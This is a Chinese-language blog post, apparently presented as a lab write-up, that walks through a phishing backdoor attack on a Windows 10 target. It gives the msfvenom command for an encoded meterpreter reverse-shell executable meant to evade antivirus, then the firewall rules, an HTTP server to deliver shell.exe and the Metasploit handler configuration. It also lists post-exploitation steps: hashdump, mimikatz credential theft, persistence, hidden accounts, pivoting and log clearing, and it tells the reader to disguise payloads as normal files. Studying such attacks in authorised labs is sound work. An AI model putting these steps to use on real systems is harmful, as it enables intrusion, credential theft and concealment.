钓鱼渗透测试实验复现
钓鱼渗透测试实验复现用途网络安全学习分享仅限授权环境测试一、实验环境角色系统/工具IP地址攻击机Windows 11矛盾武器库10.0.0.166靶机Windows 10 x6410.0.0.153攻击机Windows 11 Penetration Suite Toolkit - VMware Workstation矛盾武器库可以去下载靶机普通win10 X64二、实验原理本次实验采用「后门植入 反向连接」的经典渗透链路MSFvenom生成带有反向 Shell 的 Payload可执行文件。攻击机开启 HTTP 服务供靶机下载 Payload。MSFconsole Handler在攻击机监听指定端口等待靶机上线。靶机执行 Payload后Meterpreter 会话建立进入后渗透阶段。三、实验步骤关闭靶机防火墙互相ping网段测试链接靶机ping攻击机攻击机ping靶机生成payload攻击机使用MSF矛盾武器库自带无需额外下载分为MSFvenom和MSFconsolemsfvenom 生成 payloadmsfconsole 多模块后续操作先用msfvenom生成payload在桌面msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.0.0.166 LPORT4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe然后新开一个窗口打开攻击机的8080端口让靶机能够正常访问netsh advfirewall firewall add rule nameHTTP_8080 dirin actionallow protocoltcp localport8080还有4444端口后面也会用到netsh advfirewall firewall add rule nameMSF_4444 dirin actionallow protocoltcp localport4444在桌面开启http服务python3 -m http.server 8080打开MSFconsole命令行输入banner查看信息和各模块数量exploit漏洞攻击/利用模块auxiliary辅助模块信息收集、扫描、嗅探、指纹识别、口令猜解post后渗透模块获取目标系统的控制权以后进行的一系列攻击动作比如获取敏感信息、跳板攻击等paylods攻击代码或指令encoders加密模块对payload进行加密躲避杀毒软件的查杀nops提高和维持payload稳定性evasion高级免杀使用模块use exploit/multi/handler输入show options查看信息以下是配置信息set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.0.0.166set LPORT 4444run正在监听然后我们切换到靶机来访问攻击机地址并下载shell.exe会被实时监测查杀我们做实验环境简单教学为主关闭实时保护现在下载下来执行文件返回攻击机可以发现已经成功连接靶机然后进输入shell可以运用靶机的shell窗口输入whoami发现我们是管理员账户实验环境靶机登陆的就是管理员现在截张靶机图片成功拿下关闭攻击机实验开放窗口netsh advfirewall firewall delete rule nameHTTP_8080netsh advfirewall firewall delete rule nameMSF_4444结尾正常渗透后应该是普通用户先进行信息搜集再提升权限凭证获取权限维持横向移动做完清理痕迹不做演示。信息搜集sysinfo、getuid、ps、ipconfig、route权限提升getsystem、local_exploit_suggester凭证获取hashdump、kiwi/mimikatz明文密码权限维持persistence、注册表后门、添加隐藏用户横向移动route add socks_proxy 跳板进内网痕迹清理clearev、删除后门账户与文件万变不离其宗钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用方法多样自行发挥。以上仅作学习分享。

相关新闻

清华求真书院预科班有学生未通过考核的处理结果

清华求真书院预科班有学生未通过考核的处理结果

关于清华大学求真书院 2026 级预科班少数学生未通过考核一事,目前公开信息主要聚焦于院方的回应与后续改革方向,‌尚未公布具体的“清退”名单或详细的行政处理文件‌。 根据清华大学求真书院院长丘成桐的回应,针对该事件的处理与后续安排主要…

2026/7/13 16:39:14 阅读更多 →
离散数学符号表 50+ 核心符号速查:从集合论到命题逻辑的完整释义

离散数学符号表 50+ 核心符号速查:从集合论到命题逻辑的完整释义

离散数学核心符号全解:从集合论到命题逻辑的实战指南离散数学作为计算机科学的基石,其符号系统就像程序员的第二语言。第一次接触这些符号时,我完全被各种∧、∨、⊕搞得晕头转向——直到在算法课上因为误解了一个符号含义导致整个程序逻辑出…

2026/7/13 16:39:14 阅读更多 →
智能语音修复神器:VoiceFixer让受损音频重获新生

智能语音修复神器:VoiceFixer让受损音频重获新生

智能语音修复神器:VoiceFixer让受损音频重获新生 【免费下载链接】voicefixer General Speech Restoration 项目地址: https://gitcode.com/gh_mirrors/vo/voicefixer 在数字音频处理领域,语音修复技术正经历着革命性的变革。无论是历史录音的数字…

2026/7/13 16:39:14 阅读更多 →

最新新闻

未来荧黑字体完整指南:从算法字体到视觉设计的终极教程

未来荧黑字体完整指南:从算法字体到视觉设计的终极教程

未来荧黑字体完整指南:从算法字体到视觉设计的终极教程 【免费下载链接】glow-sans SHSans-derived CJK font family with a more concise & modern look. 未来荧黑未來熒黑ヒカリ角ゴ:基于思源黑体改造,拥有粗度和宽度系列,更…

2026/7/13 17:32:24 阅读更多 →
gl3w高级配置:启用扩展功能与自定义输出目录的实用技巧

gl3w高级配置:启用扩展功能与自定义输出目录的实用技巧

gl3w高级配置:启用扩展功能与自定义输出目录的实用技巧 【免费下载链接】gl3w Simple OpenGL core profile loading 项目地址: https://gitcode.com/gh_mirrors/gl/gl3w gl3w是一款轻量级的OpenGL核心配置文件加载器,能够帮助开发者轻松获取和管理…

2026/7/13 17:32:24 阅读更多 →
如何快速上手NVIDIA Kimi-K2.5-Thinking-Eagle3?完整部署指南与最佳实践

如何快速上手NVIDIA Kimi-K2.5-Thinking-Eagle3?完整部署指南与最佳实践

如何快速上手NVIDIA Kimi-K2.5-Thinking-Eagle3?完整部署指南与最佳实践 【免费下载链接】Kimi-K2.5-Thinking-Eagle3 项目地址: https://ai.gitcode.com/hf_mirrors/nvidia/Kimi-K2.5-Thinking-Eagle3 NVIDIA Kimi-K2.5-Thinking-Eagle3是一款基于深度优化…

2026/7/13 17:30:24 阅读更多 →
未来荧黑字体完整指南:从零开始掌握这款开源中文字体的终极教程

未来荧黑字体完整指南:从零开始掌握这款开源中文字体的终极教程

未来荧黑字体完整指南:从零开始掌握这款开源中文字体的终极教程 【免费下载链接】glow-sans SHSans-derived CJK font family with a more concise & modern look. 未来荧黑未來熒黑ヒカリ角ゴ:基于思源黑体改造,拥有粗度和宽度系列&…

2026/7/13 17:30:24 阅读更多 →
如何用GetQzonehistory找回被时间遗忘的QQ空间记忆

如何用GetQzonehistory找回被时间遗忘的QQ空间记忆

如何用GetQzonehistory找回被时间遗忘的QQ空间记忆 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 你是否曾深夜翻看QQ空间,却发现几年前的那些说说、那些青春印记早已消失不…

2026/7/13 17:30:24 阅读更多 →
深度解析:如何通过四层架构实现QQ空间历史数据安全备份

深度解析:如何通过四层架构实现QQ空间历史数据安全备份

深度解析:如何通过四层架构实现QQ空间历史数据安全备份 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 在数字记忆日益重要的今天,QQ空间作为承载了亿万人青春回…

2026/7/13 17:30:24 阅读更多 →

日新闻

Palworld存档编辑完全掌握:从零开始实现游戏数据可视化修改

Palworld存档编辑完全掌握:从零开始实现游戏数据可视化修改

Palworld存档编辑完全掌握:从零开始实现游戏数据可视化修改 【免费下载链接】palworld-save-tools Tools for converting Palworld .sav files to JSON and back 项目地址: https://gitcode.com/gh_mirrors/pa/palworld-save-tools 你是否曾经想要调整Palwor…

2026/7/13 0:01:19 阅读更多 →
浦东旧模块回收哪家强?专业评测带你一探究竟

浦东旧模块回收哪家强?专业评测带你一探究竟

于科技迅猛飞速迭代的当下此刻, 旧模块的回收处置, 不但关联着资源的再度利用, 而且更牵扯到数据安全以及环保合规事宜。你是不是也正为那堆积得如同山峦般的旧模块而发愁? 是不是不清楚该怎样安全且高效地去处理它们? 别忧心烦恼, 就在今日, 我会以具备权威影响力的自媒体博…

2026/7/13 0:01:19 阅读更多 →
卡梅德生物技术快报|重组蛋白的表达和纯化:IMAC 金属螯合色谱全流程工艺手册|基质 - 配基 - 金属离子匹配与蛋白质分离纯化参数优化

卡梅德生物技术快报|重组蛋白的表达和纯化:IMAC 金属螯合色谱全流程工艺手册|基质 - 配基 - 金属离子匹配与蛋白质分离纯化参数优化

1 研究背景与现存技术痛点(提出问题)基因工程、蛋白质组学、生物制药研发流程中,蛋白质分离纯化是决定下游实验成败的关键环节。当前实验室常规蛋白质分离纯化工艺存在三类难以标准化的技术瓶颈:传统离子交换、分子筛层析无特异性…

2026/7/13 0:05:20 阅读更多 →

周新闻

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨

互联网大厂 Java 求职面试:燕双非的搞笑回答与技术探讨 在一个阳光明媚的上午,互联网大厂的面试官坐在桌前,准备迎接他的面试候选人——燕双非,一个以搞笑和幽默著称的程序员。第一轮提问 面试官:燕双非,作…

2026/7/13 4:38:36 阅读更多 →
车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估

车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估

车载以太网PMA测试设备选型:示波器、VNA、信号源3类仪器关键参数与预算评估在智能驾驶和车联网技术快速发展的今天,车载以太网作为新一代车载网络的核心传输技术,其物理层性能直接决定了数据传输的可靠性和稳定性。1000BASE-T1作为当前主流的…

2026/7/13 4:38:38 阅读更多 →
VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战,5步完成Keil工程转换

VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战,5步完成Keil工程转换

VSCode EIDE 插件 2.0:APM32/STM32 项目迁移实战指南嵌入式开发领域正经历一场工具链的静默革命。当传统Keil用户首次打开VSCode的扩展市场搜索EIDE时,往往会惊讶于这个看似简单的插件竟能重构十余年的开发习惯。本文将揭示如何用五个精准步骤&#xff0…

2026/7/13 4:38:40 阅读更多 →

月新闻